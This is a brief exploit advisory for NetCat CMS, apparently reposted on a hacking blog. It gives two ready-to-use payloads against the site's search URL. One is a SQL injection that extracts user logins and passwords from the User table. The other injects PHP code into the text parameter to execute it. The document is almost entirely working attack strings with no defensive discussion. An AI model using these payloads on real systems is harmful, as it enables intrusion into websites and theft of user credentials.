# Exploit Title: NetCat CMS Code exec, SQL-injection# Google Dork: none# Date: 28.11.2010# Author: brain[pillow]# Software Link: http://netcat.ru/# Version: UNKNOWNOn different versions of this software next vulnerabilities are availible:=======================================================# Sql-injection:/search/?action=index&text=q)+union+select+1,1,concat_ws(0x3a,login,password),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1+from+User%23=======================================================# Code exec:/search/?action=index&text={${phpinfo()}}
Copyright © 123 H4ck' Blog. Cung cấp bởi Blogger